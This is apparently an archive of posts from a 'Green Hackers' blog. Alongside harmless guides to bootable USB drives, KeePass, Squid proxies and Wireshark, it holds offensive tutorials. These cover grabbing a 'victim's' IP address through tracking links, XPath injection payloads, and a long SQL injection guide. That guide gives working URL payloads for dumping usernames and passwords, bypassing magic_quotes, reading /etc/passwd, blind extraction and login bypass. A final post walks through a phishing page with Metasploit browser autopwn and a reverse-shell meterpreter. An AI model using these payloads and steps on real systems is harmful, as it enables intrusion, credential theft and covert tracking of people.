Green Hackers

How to Create Bootable Pendrive

2012-02-04T16:31:00.000+05:30

Hello GreenHackerz Readers............
This article is about How to make your USB Bootable.......

This guide will show you, how to use WinSetupFromUSB to create a bootable USB Flash Drive including all Windows source files, plus the following installation of Windows XP. Compare to the different USB_Multiboot versions, WinSetupFromUSB comes with a Graphical User Interface (GUI) and is in my opinion easier to use.

Here you can get the latest version of the program and you will also find many detailed informations about WinSetupFromUSB.

I’ve tested this guide with a 32-bit version of Windows XP and a 64-bit version of Windows Vista and it worked flawlessly.

Just Follow the Step ...........

All you need is:
1) USB Flash Drive with at least 1GB of storage.
2) original Windows XP Setup CD / an ISO image (which is extracted).
3) WinSetupFromUSB Software.

Preparations:-
Download and install WinSetupFromUSB (The link is given at the end of the article). Default installation path is C:\WinSetupFromUSB.

Create a new folder with the name WINXPCD in the root directory of drive C:\ (or in other drive) and copy all files from your Windows XP Setup CD into this folder. Depending on your version of Windows XP, the content of C:\WINXPCD should look approximately like this:

The following files will show you, which Service Pack is already integrated into your CD:

WIN51IC.SP1, Sevice Pack 1
WIN51IC.SP2, Sevice Pack 2
WIN51IC.SP3, Sevice Pack 3

Start WinSetupFromUSB:-

Connect the USB Flash Drive to your PC and start WinSetupFromUSB. It should show up under USB Disk Selection :

3. Select your Source Path

Click on Browse under Windows 2000/XP/2003 Source and navigate to the folder with your Windows XP Source Files. It should be C:\WINXPCD:

Click OK and C:\WINXPCD should show up under Windows 2000/XP/2003 Source :

Format USB Flash Drive:-

PeToUSB or HP Format Tool are used to format the USB Flash Drive. There is no need to download these programs seperately as they are already included in WinSetupFromUSB.

USB Flash Drives up to 2GB should be formatted with PeToUSB in FAT16, USB Flash Drives with 4GB or more with HP Format Tool in FAT32.

Copy Windows XP Source Files:-

To start the process of copying the Windows XP source files to the USB Flash Drive, click GO in the main window of WinSetupFromUSB. Depending on the write speed of your USB Flash drive it may take a while to copy all files.

At the end the following notice about the Windows installation process should be displayed:

Now reboot your machine and boot this time with your USB.

To perform this goto boot menu option (Note: Every machine has different key to go into the book menu, in my machine it is key f11) and select from there your USB.

Now Run First Part of XP then Second Part at the time of next restart ie after copying of file complete.

Download link: Click Here

There are also many other tools available for making USB bootable such as : XBOOT, YUMI, PE TO USB etc.... You can use them also.

Hope you Like it.....

Enjoy the bootable USB.

How To Find IP Address of Remote Machine

2011-11-15T11:24:00.001+05:30

Hello GreenHackerz Readers...............

This is the article about getting the IP address of the remote computer i.e in terms of hacking getting the IP address of the victim computer.

Before proceeding lets know something about IP address.

0x01-What is IP address?

IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication.

IP address serves for two basic purposes:

1. Host or network interface identification

2. Location Addressing

Now lets move to our moto..........

0x02-How to get IP address of remote computer or victim computer?

There are four techniques to get the IP address of remote computer or victim computer. These are as follows:

Using PHP notification script.
Sniffing during chat sessions.
Using Blogs and Websites.
Using read notify service.

Now lets go in detail one by one ....................

1. Using PHP notification script.

Using this Notification script you can get the IP address in just seconds.

Steps of using this PHP script:

a) First download the PHP Notification Script and extract it.
You can download this script by click the below download link.

Download: Click Here

b) Now you will get two files IP.html and index.php.

You need to upload these two files to any free web hosting servers.

Here is the list of some free web

hosting servers.

www.my3gb.com

x10hosting.com

www.freehostia.com

www.ripway.com etc.....

you can find more on web.

c) To upload these files you have to first sign up in the website. After uploading the file you will get a link

of your uploading files.

Suppose you open a new account in www.my3gb.com with the subdomain as xyz, then your IP link

would be http://www.xyz.my3gb.com/index.php

d) Now you will need to send the link of index.php to the victim whose IP address you want to get.

e) Now when the victim opens the above link nothing will open but his Ip address is written into the

ip.html file. So open the ip.html file to get his IP address.

f) That’s all about this method… hope you understood it.

2. Sniffing during chat sessions.

With the help of Sniffers like wireshark etc. you can sniff the Gmail, and yahoo or any other chat sessions while we are chatting to any of your friend and extract the IP address from there. You can read about the tool wireshark by clicking on the below link.

http://www.greenhackerz.com/2011/09/wireshark.html

3. Using Blogs and Websites.

This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.

4. Using read notify service.

Using read notify service is an email based service.

Steps to use Read Notify service is as follows:

a) First open the Read Notify website : RCPT

b) Now register on this website and then it will send you confirmation mail. Verify your account.

c) Once your account is activated. Do the following steps to use this service:

Compose your email just like you usually would in your own email or web email program.
Type: .readnotify.com on the end of your recipients email address (don’t worry, that gets removed before your recipients receive the email). Like this: hackersfind@gmail.com.readnotify.com .
Send your email.

Some things to remember:

don’t send to and from the same computer.
if your email program ‘auto-completes’ email addresses from your address book, you’ll need to keep typing over the top of the auto-completed one to add the .readnotify.com .
if you are cc-ing your email to other readers, you must add tracking to all of them.

I hope this article is beneficial for you. Enjoy the tips and tricks.

XPath Injection

2011-11-09T14:41:00.001+05:30

Hello GreenHackerz Readers...........

This article is about a technique used to exploit the websites. The technique named as "XPath Injection".

So lets start reading......

0x01-XPath Injection Description.

Similar to SQL Injection, XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to elevate his privileges on the web site if the XML data is being used for authentication (such as an XML based user file).

Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. Like SQL, you can specify certain attributes to find, and patterns to match.

When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data. XPath is a standard language; its notation/syntax is always implementation independent, which means the attack may be automated. There are no different dialects as it takes place in requests to the SQL databeses. Because there is no level access control it's possible to get the entire document. We won't encounter any limitations as we may know from SQL injection attacks.

Example:

Input the query as shown in below image:

you get the result as shown below:

The result includes much sensitive information, now you can get a conclusion that the application use XML file to store user authentication data.

In order to analyse the injection process, we modify the sever script to output the query sentence to user’s browser. Input the following username or password:

999'] | * | user[@role='admin

Result:

The text with red frame is the XPath query sentence. 999'] | * | user[@role='admin has been injected the sentence successfully.

Now, let’s see the source code of index.asp:

Response.write("<html><body>");

uid=Request.form("uid");

pwd=Request.form("pwd");

Response.write("<form method=\"POST\">Username:<input name=\"uid\"

size=\"20\"/><br>Password:<input name=\"pwd\" size=\"20\"/><input type=\"submit\"

value=\"Login\"/></form>");

var xmlDom=new ActiveXObject("Microsoft.XMLDOM");

xmlDom.async="false";

xmlDom.load("/Inetpub/wwwroot/xpath/user.xml");

var auth="//users/user[loginID/text()='"+uid+"' and password/text()='"+pwd+"']";

Response.write(auth);

var UserObj=xmlDom.selectNodes(auth);

if(UserObj.length>0) Response.write("<br><br>Login OK!");

else Response.write("Please Input Correct Username and Password!");

Response.write(UserObj.Xml);

for(var i=0;i<UserObj.length;i++)

{

Response.write("<xmp>");

Response.write(UserObj(i).xml);

Response.write("</xmp>");

}

Response.write("</body></html>");

</script>

user authentication file user.xml :

<?xml version="1.0" encoding="UTF-8"?>

<users>

<user>

<lastname>Elmore</lastname>

</user>

<user>

<firstname>Shlomy</firstname>

<lastname>Gantz</lastname>

</user>

</users>

You can get the XPath query sentence as follow:

auth="//users/user[loginID/text()='"+uid+"' and password/text()='"+pwd+"']"

It means that, select user nodes which uid is equal to your input uid and password is equal to your input pwd;

The actual XPath sentence is set to:

//users/user[loginID/text()='999' and password/text()='999'] | * | user[@role='admin'] ,

The logic result is select all nodes, XPath injection occurred.

0x02-XPath Injection Tool

WebCruiser - Web Vulnerability Scanner

WebCruiser - Web Vulnerability Scanner, a compact but powerful web security scanning tool!

It has a Crawler and Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc. ).

It can support scanning website as well as POC( Prooving of concept) for web vulnerabilities:

SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also a SQL Injector,

a XPath Injector , and a Cross Site Scripting tool!

Function:

Crawler(Site Directories And Files);
Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc.);
POC(Proof of Concept): SQL Injection, Cross Site Scripting, XPath Injection etc.;
GET/Post/Cookie Injection;
SQL Server: PlainText/FieldEcho(Union)/Blind Injection;
MySQL/Oracle/DB2/Access: FieldEcho(Union)/Blind Injection;
Administration Entrance Search;
Time Delay For Search Injection;
Auto Get Cookie From Web Browser For Authentication;
Report Output.

Excluding this there are also some other good Web Vulnerability Scanners tools available in market like Acunetix , Grandel Scan etc.....

Hope you like the article.

Enjoy XPath Injection

Keep All Passwords In Pocket !!

2011-11-01T14:16:00.000+05:30

Hello GreenHackerz..

Todays biggest problem for us to remember our all passwords. Because Today we need to remember many passwords. We need a password for the Windows network logon, our e-mail account, our website's FTP password, online passwords (like website member account),etc.etc.etc.. and one of the most important password for youth is facebook account's passwords.. :)

The list is endless. Also, we should use different passwords for each account. Because if we use only one password everywhere and someone gets this password so we have a problem... Even A serious problem.The Thief (Hacker) would have access to our e-mail account, website, etc...

Here is the simple solution.You can securely save all your passwords in a USB device or even in iPod and keep it in your pocket with KeePass Password Safe.

For Download Click Here

What is KeePass?

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

Visit official website Click Here

How To Use

(1) Simply Download KeePass

(2) Extract it in your Pen Drive or at your desired location.

(3) Open KeePass.exe & Click on New to Create New Database for your Passwords and give strong password or make key file for your database.

(4) Now simply you can add entry

(5) Your entreis look like this..

(6) You can use autotype feature by simply press Ctrl+V if database is open it automatically fill username , Passwaord and login to your account..

Enjoy Friends with KeePass Safe..

Hash Code Cracker

2011-10-20T16:34:00.004+05:30

Hello GreenHackerz readers......

The article is about a tool known as "Hash Code Cracker".

Before we go to tool let's learn something about Hash Codes.

0X1 : What is Hash Code or Hash Function?

A hash function is any algorithm or subroutine that maps large data sets to smaller data sets, called keys.

For example, a single integer can serve as an index to an array (cf. associative array). The values returned by a hash function are called hash values, hash codes, hash sums, checksums or simply hashes.

Hash functions are mostly used to accelerate table lookup or data comparison tasks such as finding items in a database, detecting duplicated or similar records in a large file, finding similar stretches in DNA sequences, and so on.

This is the software which is used for cracking the Hash code like MD5, SHA1, NTLM (Windows Password) etc.

The software is easy to use and no need to install. Supports All platforms(windows XP/7,Linux,....).

To software is in .jar form. So to use in windows do the following steps.

1. Open the Command Prompt.

2. Navigate to the path where you save it.

3.Now type "java -jar <name of the jar file>" (without Double Quotation)

Download : Click Here

espérons qu'il vous plaira.

Enjoy the tool.

The complete guide to SQL Injections

2011-10-16T19:50:00.001+05:30

Hello GreenHackerz readers......

This article is about a technique which is used for hacking the websites and the technique is very popular among hackers. The technique is known as SQL Injections.

So, lets start reading ............

What is SQL Injection

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

0x00 - Intro

All the information contained in the article is from personal experience, if I don't go over something that you currently do or have seen in SQL injections, its because I do not use it; not saying I'm right just that's how it is. As you should already know, extracting database information from a server without administration approval is illegal and I cannot be held accountable for any malicious actions executed after reading this article.

0x01 - What is MySQL

"SQL" stands for "Structured Query Language," which simply allows users to send queries to the server database. There are different types of SQL such as MySQL, which is Microsoft's version of the language and also has some different commands as well as syntax.

0x02 - Finding SQL Injections

Before jumping into this topic I want to explain to you about comments in MySQL. There are three variations to a comment in this language:

As you should already know a comment just blocks out a section so it will not be executed through the query. Typically, anytime you see a page from a website that takes in a parameter such as:

?id=

?category_id=

?user_id=

(not saying injections are narrowed down to only id parameters but they are quite common) you may want to test the page for a vulnerability. The simplest way I know of to check for a vulnerability is to add:

" and 1=1--

to the end of the URL and see if the contents of the page change, even the slightest bit, if they don't then add

" and 1=0--

(it doesn't have to be 1=1 or 1=0 just something that returns true for the first statement and false for the second) and see if it changes after the second. If the contents change after the second query then you have a vulnerability.

0x03 - Gathering Information

To make your job or life a little easier you should look around the site some to gather information on what you are trying to retrieve. For instance, if the site has a user registration look at the source code for the page and take note of the field names they use (most developers are lazy and use the same names for simplicity); you can also look around the site for more vulnerabilities. Alright so once you have found some good information to look forward to, its time to find out how many columns are being selected from the database from the original query. This is an important step because if number of columns you "select" and the number from the original are not identical, the injection does not work! To find out the number of column you simply add "order by x" on the end of your vulnerable URL replacing "x" with a increasing number until you get an error

http://www.site.com/vulnerable.php?id=4 order by 9--

the number of columns being selected is the value of x before the error.

0x04 - The Injection

I suppose this is where some people get confused. In MySQL in order to combine two query statements you can use the keyword "union", you can also include the keyword "all" which will display all results (default property of union is to remove duplicate results from display). After your "union all" you also need to include the keyword "select" since we are going to want to select database information and display it on the screen so far you should be looking at something similar to:

http://www.site.com/vulnerable.php?id=4 union all select

Continuing the injection like the previous example will work fine, but it will also display all the original results as well as our new results, typically to bypass this I, as well as most of the other people exploiting SQL injections, replace the id value, in the case of our example it would be 4, with one of the following:

-1

null

or any result that would not be in the database, this way the original select query will not result anything but our new injected select query will display. In SQL each column being selected must be separated by a comma(,) so if your vulnerable site is selecting 4 columns with the original statement (which was found earlier when we were gathering information using the "order by") you would just concatenate those on your injection; I like to set each column to a different numeric value that way i can keep track of which columns are actually being displayed on the screen. So far, if everything has been going good, you should have an injection URL looking something like:

http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4--

If not then go back and keep reading it until you figure it out. The last part of our injection setup is the telling the query which table to "select" the information from; we do this with the keyword "from table"...pretty self explanatory right? So for example, we have a vulnerable site that has 4 columns being selected and we want to look at the "users" table we can have a set up such as:

http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4 from users--

Easy enough so far, now is where it gets a little more difficult, but not too much.

0x05 - Tables and Columns

Depending on the version of MySQL the administrators are running on the server, finding table and column names can be very easy or somewhat irritating. There is an easy way to figure out what version is running on the server, can you guess? If you did not guess version(), why the hell not, its like one of the easiest and self explanatory things ever! Anyways, replace one of the columns in your injection that displays on the screen with the function call version() and this will tell you which typically its either 4.x.x or 5.x.x. If they are running some form of version 4 then you're basically on your own when it comes to figuring out table and column names (I'll post some examples of common names later); though if version 5 is implemented then your life is easy. As of version 5.1 of MySQL the developers began to automatically include a master database on the server called INFORMATION_SCHEMA. Within information_schema there are tables that give information about all the tables, columns, users, etc on the entire SOL server (to find more about the structure of information_schema and the table/column names visit http://dev.mysql.com/doc/refman/5.0/en/information-schema.html). Once you figure out a table name and some column names within that table you want to look at just place them into our injection setup from before; suppose we have a site that has a "users" table and columns "user" and "pass" and the second and third columns are displayed onto the screen, we could view these by an injection such as:

http://www.site.com/vulnerable.php?id=-1 union all select 1,user, pass, 4 from users--

This example will display both the user and pass onto the screen in the given positions, though what happens if only one column is selected or displayed? In MySQL there is function called concat() which simply concatenates fields together so to simplify our previous example we could have:

http://www.site.com/vulnerable.php?id=-1 union all select 1, concat(user,0x3a, pass), 3, 4 from users--

"0x3A" is just a colon(:) in hexadecimal, simply to separate the two fields for my own viewing.

0x06 - Narrowing down the Selection

Typically when performing a SQL injection there are multiple results you want to look at or possibly just one individual. There are a couple of ways to narrow down your selection first way is to use the "where" keyword is just takes a logical parameter such as "where id=1" which would look in the id column in the table and find which row is equal to 1. The next way to to use the "limit" keyword; this way is a little more useful since you do not need to know an additional column name to increment through the selections limit takes two parameters, where to start the selection and how many to select. So in order to select only the very first "user" from the table "users" using the "limit" keyword you could have:

http://www.site.com/vulnerable.php?id=-1 union all select user from users limit 0,1--

to look at the rest of the users individually you just increment the 0 up until you get an error. In order to look at all the results in a single swipe you can use the function group_concat() which works very similarly to concat() except it displays all the results for the given column(s) separated by a comma(,) (the comma is just the default, you can change it by using the "separator" keyword and indicate a symbol to use).

0x07 - Obstacles

Excluding the fact that version 4 in general is an obstacle, there are a few different things web developers can do to try and make sql injections a little more difficult. The most common of these annoyances would be magic_quotes; basically magic quotes disallows any type of quotation marks and breaks it by adding a back-slash(\), which of course is going to mess up your injection. To get around this there is the nice little function char(); char() takes ascii values and generates the corresponding character value, thus eliminating the need for a quote. Example time...say we want to look at the "pass" column FROM the table "users" but only WHERE the "user" column is only equal to "admin" and the site only selects one column from the original query, easy enough right? we learned this earlier

http://www.site.com/vulnerable.php?id=-1 union all select pass from users where user="admin"--

curve ball! the developers have enabled magic_quotes therefore your "admin" will not work properly...i know its sad. To fix it we simply take the ascii values of each character (http://crashoverron.t35.com/ascii.php) so now we get

http://www.site.com/vulnerable.php?id=-1 union all select pass from users where user=char(97,100,109,105,110)--

TA-DA! injection fixed. Also another safety feature they try to block us with is regular expressions to search our input, but often times they have their expressions set to such narrow possibilities that you can bypass them by simply changing the case, the comment symbol, or replacing spaces with "+" (SQL is not case sensitive, it also sees "+" as a space filler much like a space).

0x08 - Additional opportunities

Although I said before version 4 was a pain in the ass, I have also noticed a nice feature common to version 4 vulnerable sites I have come across in my adventures; this feature would be the function load_file(), not saying the function is exclusive to version 4 but from my experience it is most commonly enabled for current users by developers for some reason in this version. load_file() acts just as file_get_contents() from PHP in that it returns the contents of the file into a string format. If enabled this allows for more than just SQL styles hacks on the server, it now allows for LFI vulnerabilities as well. Although, load_file() needs to have the exact full path to the file you are trying to open, for example: /home/CrashOverron/Desktop/file, and if input as a literal string then it must be encased in quotes, which brings back the issue of magic_quotes but as before just use the char() function. The next interesting feature that is hardly ever possible, but I have seen happen, is the use of the "INTO OUTFILE" keywords. This is the exact opposite of load_file(), in order to use either of these features the current user that MySQL is running as must have the FILE privilege on the server. Again, the full path is needed for the output file, which cannot be an existing file, though unlike load_file() the char() function does not fix magic_quotes. Time for an example of both, here is the situation: vulnerable site has 1 column selected also has a "users" table. load_file no magic_quotes:

http://www.site.com/vulnerable.php?id=-1 union all select load_file('/etc/passwd')--

load_file with magic_quotes:

http://www.site.com/vulnerable.php?id=-1 union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))--

INTO OUTFILE:

http://www.site.com/vulnerable.php?id=-1 union all select "test" INTO OUTFILE "/etc/test" from users--

0x09 - Blind SQL Injection

Blind SQL injection occurs when the original select query obtains column information but does not display it onto the screen. In order to continue through a blind SQL injection you must basically brute-force any value you want to know. There are a few functions we can use in conjunction with each other that make this quite easy yet tedious, those would be the mid() and the ASCII() functions. mid() is MySQL's sub string function and ascii() does the exact opposite of char() it takes a character and exchanges it with the corresponding ASCII numeric value. Doing this allows us to determine the range each of our desired value is in on the ASCII chart, thus narrowing each down until we find a match. Example situation; we have found a site that is vulnerable to blind sql injection and we want to figure out which user MySQL is currently running as, our injection sequence could look something like:

http://www.site.com/vulnerable.php?id=1 and ascii(mid(user(),1,1)) < 97--

(this will tell us if the first letter in the user is above/below "a" then we can change the 97 to a different value until we find the character to the first letter)

http://www.site.com/vulnerable.php?id=1 and ascii(mid(user(),2,1)) < 97--

(just repeat as before and keep incrementing through the letters and you will eventually have the current user)

0x10 - Login Bypass

Ok, I left this for towards the end because it is not really very common anymore but I will through it in because I suppose you may run across it some day (I have only ran across this vulnerability once in real world). The concept behind the SQL login bypass is quite simple; in order to execute the exploit you input a username into the user field then in the password field of the form you put:

' or 1=1--

this just ends the current password field and includes the logical OR with a constant true statement. A simple MySQL login script could look like:

<?php $user = $_POST['user']; $pass = $_POST['pass']; $ref = $_SERVER['HTTP_REFERER']; if((!$user) or (!$pass)) { header("Location:$ref"); exit(); } $conn = @mysql_connect("localhost", "root", "blah") or die("Could not connect"); $rs = @mysql_select_db("db", $conn) or die("db error"); $sql = "SELECT * FROM users WHERE user=\"$user\" AND pass=\"$pass\""; $rs = mysql_query($sql, $conn) or die("query error"); $num = mysql_numrows($rs); if($num != 0) { echo("Welcome $user"); } else { header("Location:$ref"); exit(); } ?>

so if we input the user "admin" and "" or 1=1--" as the password the query sent to the server is going to look like this:

"SELECT * FROM users WHERE user="admin" AND pass="" or 1=1--"

so the server is going to select row where the "user" equals "admin" and disregard if the "pass" is correct because it is asking if the pass OR 1=1 are true, since 1=1 is always true you bypass the pass section.

0x11 - Useful Keywords/Functions

UNION ALL SELECT AND/OR ORDER BY WHERE LIMIT LIKE INTO OUTFILE char() ascii() mid() concat() group_concat() load_file() user() database() version()

That's all about the SQL.... Hope u like it ...

Hacking Windows With Backtrack 5 Using Social Engineering Toolkit

2011-10-13T16:47:00.000+05:30

Hello GreenHackerz...

Today I'm going to write about Social Engineering Attack with Backtrack 5.

So you must have knowledge about Backtrack and offcourse Metasploit Framework. To learn more about Metasploit Click Here.

What is Social Engineering Toolkit?

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

In this tutorial we will see how this attack methods can owned your computer in just a few steps….

Note: The success possibility of this attack depend on victim browser. If the victim never update their browser, the possibility can be 85% or more.

Requirement :

Backtrack 5, Backtrack 4

Step (1)

Change your work directory into /pentest/exploits/set/

Or Goto:

Step (2)

Open Social Engineering Toolkit(SET) ./set and then choose "Website Attack Vectors" because we will attack victim via internet browser. Also in this attack we will attack via website generated by Social Engineering Toolkit to open by victim, so choose "Website Attack Vectors" for this options.

Step (3)

Usually when user open a website, sometimes they don't think that they are opening suspicious website that including malicious script to harm their computer. In this option we will choose "The Metasploit Browser Exploit Method" because we will attack via victim browser.

Step (4)

The next step just choose "Web Templates", because we will use the most famous website around the world that already provided by this Social Engineering Toolkit tools.

Step (5)

There are 4 website templates Ready To Use for this attack methods, such as GMail, Google, Facebook, and Twitter. In this tutorial I will use Google, but if you think Facebook or Twitter more better because it's the most accessed website, just change into what do you want.

Step (6)

For the next step…because we didn't know what kind of vulnerability that successfully attack the victim and what type of browser, etc, in this option we just choose "Metasploit Browser Autopwn" to load all vulnerability Social Engineering Toolkit known. This tools will launch all exploit in Social Engineering Toolkit database.

Step (7)

For payload options selection I prefer the most use Windows Shell Reverse_TCP Meterpreter, but you also can choose the other payload that most comfortable for you.

Step (8)

The next step is set up the Connect back port to attacker computer. In this example I use port 4444, but you can change to 1234, 4321, etc

Step (9)

The next step just wait until all process completed and also wait until the server running.

Step (10)

When the link given to user, the victim will see looks-a-like Google(fake website). When the page loads it also load all malicious script to attack victim computer.

Step (11)

In attacker computer if there's any vulnerability in victim computer browser it will return sessions value that mean the exploit successfully attacking victim computer. In this case the exploit create new fake process named "Notepad.exe".

Step (12)

To view active sessions that already opened by the exploit type "sessions -l" for listing an active sessions. Take a look to the ID…we will use that ID to connect to victim computer.

Step (13)

To interract and connect to victim computer use command "sessions -i ID". ID is numerical value that given when you do sessions -l. For example you can see example in picture below.

Step (14)

Victim computer owned (Hacked).. :)

Step (15)

Now you can do lots of stuffs with victim machine if u know the power of meterpreter..

Hope You Enjoyed It...

Leave your Comments & Suggestion.. @@@@

Transparent Proxies in Squid

2011-10-07T01:59:00.001+05:30

Hello GreenHackerz readers............

The article is about transparent proxy in squid server. The squid server is a server which configure in Linux based system. So, Lets Start.........

With, the extremely uncontrollable growth in the number of Hackers, not only system administrators of servers have to worry about the security of their system, but even if you are running a standalone PPP Linux box, you simply cannot afford to ignore your system's security.

If your system is the main server which communicates with the external untrustworthy network called the Internet, or even if you simply use your Linux box to connect to your ISP and surf the net through PPP, then you should definitely think about installing a firewall on your system.

The preferable and the best option in this case is to install a commercial firewall. However, this option is not always possible and is more often than not unnecesarry. Buying, installing and configuring a good commercial firewall is not only expensive but most beginners find it pretty formidable. OK, I do not want to go through the hassle of a commercial firewall, what do I do? Well, 'ipchains' hold the key for you.

The Firewalling code in the Linux Kernel chnaged considerably after the release of Kernel 2.2. Since then, a lot of new utilites and features have been added. Amongst these improvements, is a kewl feature called 'ipchains', which is primariarly used for configuring the firewalling rules and other such related details.

HACKING TRUTH: The usage of ipchains is very much similiar to that of ipfwadm. For more information(like, help on setting rules.) refer to the wrapper script:

/sbin/ipfwadm_wrapper

Anyway, in this manual, we will learn about how to use ipchains to configure a transparent proxy on your Linux box. So what exactly is a transparent proxy?

Well, a transparent proxy is basically something which fools the client (who connect to the server running the transparent proxy) into believing that they are directly connected to the web server (and not through a proxy.). OK, I am sorry, that is not exactly the correct way to describe it. ;-) Read on for a better description.

Well, a transparent proxy works in the following manner: It listens to a specific port (like the HTTP port i.e. 80) for any connections. As soon as it gets a request for a connection (in this case a HTTP request for a file.) then it redirects the user i.e. connection to another port on the same machine. Now this new port to which the connection is transferred is actually running a Proxy.

So, in affect what happens is, the client i.e. the user who connects to the server where the transparent proxy installed, assumes that it is directly connected and is communicating with the HTTP daemon. However, the truth of the matter is that all communication is being carried out via the proxy running on the server. All this would be clearer when you see the below picture of what happens:

Client --------> Server(Port 80 or HTTP)

The rules of the ipchains transfers client to the port where the proxy is running. So, now the communication takes place in the following manner:

Client --------> Server(Port of Proxy) --------> Server (Port 80 or HTTP)

So, the connection to Port 80 is indirect, however the client has little idea about it.

Now, that you know the working of transparent proxies, let us get down to configuring them on your machine. However, before we get down to the actual process, you need to check whether this is possible on you system or not. Simply look for the file:

/proct/net/ip_fwchains

If you have this file, then well and good, else you will have to recompile your Kernel. However, I am sure almost 98% of you would definitely have this file.

NOTE: In this case, we will be transferring all connections from Port 80 to Port 8080 where Squid runs by default. You could always transfer connections to any proxy port of your choice, by changing the revelant parts. I have taken up Squid, as it is the most common one.

Firstly, in order to transfer all connections from Port 80 to Port 8080, add the following lines to your startup script, so that they are executed each time you boot up.

Note: The server IP is xxx.xx.xx.xx

ipchains -A input -p TCP -d 127.0.0.1/32 www-j ACCEPT

ipchains -A input -p TCP -d xxx.xx.xx.xx/32 www-j ACCEPT

ipchains -A input -p TCP -d 0/0 www-j REDIRECT 8080

NOTE: If you are using ipfwadm, then add the following lines to the startup script:

ipfwadm -I -a-a -P tcp-s any/0 -D 127.0.0.1

ipfwadm -I -a-a -P tcp-s any/0 -D xxx.xx.xx.xx

ipfwadm -I -a-a -P tcp-s any/0 -D any/0 80 -r 8080

Once this is done, then configure Squid by following the below process. Please note that you need atleast Squid 2.x to be able to make use of Transparent Proxies. Anyway, to configure Squid, edit the, /etc/squid/squid.conf file and make the following changes:

httpd_accel_host virtual

httpd_accel_port 80

httpd_accel_with_proxy on

httpd_accel_uses_host_header on

Then,restart Squid by typing:

/etc/rc.d/init.d/squid.init restart

Voila, your transparent proxy is configured and running!!! Anyway, have fun and watch out for updated versions of this manual.

Wireshark

2011-09-24T15:27:00.000+05:30

Hello GreenHackerz readers...

The article is about a tool known as wireshark. This is a tool used for analysing network.

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.

Wireshark is cross-platform, using the GTK+ widget toolkit to implement its user interface, and using pcap to capture packets; it runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. There is also a terminal-based (non-GUI) version called TShark. Wireshark, and the other programs distributed with it such as TShark, are free software, released under the terms of the GNU General Public License.

Functionality:

Wireshark is very similar to tcpdump, but has a graphical front-end, plus some integrated sorting and filtering options. Wireshark allows the user to put the network interfaces that support promiscuous mode into that mode, in order to to see all traffic visible on that interface, not just traffic addressed to one of the interface's configured addresses. On Linux, BSD, and Mac OS X, with libpcap 1.0.0 or later, Wireshark 1.4 and later can also put Wi-Fi adapters into monitor mode.

Features:

Wireshark is software that "understands" the structure of different networking protocols. Thus, it is able to display the encapsulation and the fields along with their meanings of different packets specified by different networking protocols. Wireshark uses pcap to capture packets, so it can only capture the packets on the types of networks that pcap supports.

Data can be captured "from the wire" from a live network connection or read from a file that recorded already-captured packets.
Live data can be read from a number of types of network, including Ethernet, IEEE 802.11, PPP, and loopback.
Captured network data can be browsed via a GUI, or via the terminal (command line) version of the utility, TShark.
Captured files can be programmatically edited or converted via command-line switches to the "editcap" program.
Data display can be refined using a display filter.
Plug-ins can be created for dissecting new protocols.
VoIP calls in the captured traffic can be detected. If encoded in a compatible encoding, the media flow can even be played.
Raw USB traffic can be captured with Wireshark.This feature is currently available only under Linux.

Wireshark's native network trace file format is the libpcap format supported by libpcap and WinPcap, so it can exchanges files of captured network traces with other applications using the same format, including tcpdump and CA NetMaster. It can also read captures from other network analysers, such as snoop, Network General's Sniffer, and Microsoft Network Monitor.

Security:

Capturing raw network traffic from an interface requires elevated privileges on some platforms. For this reason, older versions of Ethereal/Wireshark and tethereal/TShark often ran with superuser privileges. Taking into account the huge number of protocol dissectors that are called when traffic is captured, this can pose a serious security risk given the possibility of a bug in a dissector. Due to the rather large number of vulnerabilities in the past (of which many have allowed remote code execution) and developers' doubts for better future development, OpenBSD removed Ethereal from its ports tree prior to OpenBSD 3.6.

Elevated privileges are not needed for all of the operations. For example, an alternative is to run tcpdump, or the dumpcap utility that comes with Wireshark, with superuser privileges to capture packets into a file, and later analyze the packets by running Wireshark with restricted privileges. On wireless networks, it is possible to use the Aircrack wireless security tools to capture IEEE 802.11 frames and read the resulting dump files with Wireshark.

As of Wireshark 0.99.7, Wireshark and TShark run dumpcap to do traffic capture. On platforms where special privileges are needed to capture traffic, only dumpcap needs to be set up to run with those special privileges: neither Wireshark nor TShark need to run with special privileges, and neither of them should be run with special privileges.

Obtain appropriate Wireshark package

Obtain a Wireshark package or installer for the operating system running on the system which is to be used for packet capture.

Wireshark is included in Novell's SUSE Linux products (for some products, under its old name, Ethereal). For other platforms, download a binary or installer from http://www.wireshark.org. With installers, ensure all product components are selected for installation.

Start Wireshark:

